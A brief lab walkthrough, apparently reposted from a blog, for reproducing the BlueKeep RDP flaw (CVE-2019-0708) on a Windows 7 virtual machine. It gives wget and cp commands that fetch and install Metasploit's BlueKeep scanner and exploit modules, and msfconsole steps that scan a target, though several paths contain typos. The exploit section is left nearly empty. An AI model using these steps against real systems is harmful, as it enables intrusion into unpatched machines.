Reproduction CVE_2019_0708

Xx_introduction

• Please protection,respect,love,"China‘s Internet Security Act"!
• For learning reference only！
• Please indicate the source！

Ax_Preparation

• windows 7 SP1 Download:ed2k://|file|cn_windows_7_ultimate_with_sp1_x64_dvd_u_677408.iso|3420557312|B58548681854236C7939003B583A8078|/
• VMware Workstation pro 15 Download:https://my.vmware.com/cn/web/vmware/info/slug/desktop_end_user_computing/vmware_workstation_pro/15_0
• Metasploit 5.x Download: https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers
• linux parrot Download:https://parrotlinux.org/download-security.php
• CVE-2019-0708 exploit tools:

1. wget https://github.com/rapid7/metasploit-framework/edb7e0221e2088497d1f61132db3a56f81b8ce9/lib/msf/core/explot/rdp.rb
2. wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/rdp_scaner.rb
3. wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb
4. wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb
5. cp rdp.rb /usr/share/metasploit-framework/lib/msf/core/exploit/
6. cp rdp_scanner.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/
7. cp cve_2019_0708_bluekeep_rce.rb /usr/share/metasploit-framework/modules/exploits/windows/rdp/
8. cp cve_2019_0708_bluekeep.rb /usr/share/metasploit-framework/modules/auiliary/scanner/rdp/

Bx_Scan

• MSF update
  1 apt-get update
  2 apt-get install metasploit-framework

   

• 1 su root
  2 msfconsole
  3 reload_all
  4 search 0708
  5 use auxiliary/scanner/rdp/cve_2019_0708_bluekeep
  6 set rhosts xxx
  7 run

  

Cx_Exploit

• once again

Reproduction CVE_2019_0708

原文：https://www.cnblogs.com/enomothem/p/11516626.html